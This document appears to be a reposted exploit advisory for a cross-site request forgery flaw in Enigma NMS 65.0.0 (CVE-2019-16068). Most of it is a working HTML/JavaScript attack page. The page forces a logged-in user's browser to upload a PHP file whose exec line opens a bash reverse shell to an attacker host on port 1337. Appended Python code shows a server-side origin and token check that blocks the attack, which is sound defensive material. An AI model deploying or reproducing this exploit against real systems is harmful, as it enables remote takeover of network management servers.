
TheHackerWorld Official

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.

<html>
  <script>history.pushState('', '', '/')</script>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
      xhr.withCredentials = true;

      var body = "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action\"\r\n" + 
        "\r\n" + 
        "system_upgrade\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
        "\r\n" + 
        "upload_file_complete\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
        "Content-Type: application/x-php\r\n" + 
        "\r\n" + 
        "\x3c?php\n" + 
        "\n" + 
        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
        "\n" + 
        "?\x3e\n" + 
        "\r\n" + 
        "-----------------------------208051173310446317141640314495\r\n" + 
        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
        "\r\n" + 
        "evil.php\r\n" + 
        "-----------------------------208051173310446317141640314495--\r\n";

      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
    submitRequest();
    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  </script>
  <body onload="submitRequest();" >
  </body>
</html>
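The request above succeeds because manage_files.cgi trusts the session cookie alone: the browser attaches it to a cross-site multipart POST and nothing ties the request to a page the application itself served. The guard below is an added example of the server-side check that stops it (it is not Enigma NMS code; the allowed origin, the session dictionary and the header/form dictionaries are constructed assumptions). It requires both a same-site Origin/Referer (and a non-cross-site Sec-Fetch-Site when the browser sends one) and a per-session token that a forged form cannot know.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed: the origin(s) the NMS is legitimately served from.
ALLOWED_ORIGINS = {"https://nms.example.internal"}


def issue_csrf_token(session):
    """Bind a fresh random token to the server-side session.

    The application embeds it as a hidden field in every form it renders,
    so a page on another origin cannot reproduce it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _request_origin(headers):
    """Derive scheme://host[:port] from Origin, falling back to Referer."""
    origin = headers.get("origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_check(headers, form, session):
    """Return (allowed, reason) for a state-changing, cookie-authenticated request.

    headers: mapping of HTTP request headers (any case)
    form:    decoded form fields of the POST body
    session: the server-side session the cookie resolved to"""
    hdr = {k.lower(): v for k, v in headers.items()}
    fetch_site = hdr.get("sec-fetch-site")
    if fetch_site is not None and fetch_site not in ("same-origin", "none"):
        return False, f"Sec-Fetch-Site is {fetch_site}"
    origin = _request_origin(hdr)
    if origin is None:
        return False, "missing Origin/Referer on state-changing request"
    if origin not in ALLOWED_ORIGINS:
        return False, f"cross-site origin {origin}"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"
```

Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer, but the token check is what protects older clients and any path where the cookie is still attached.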
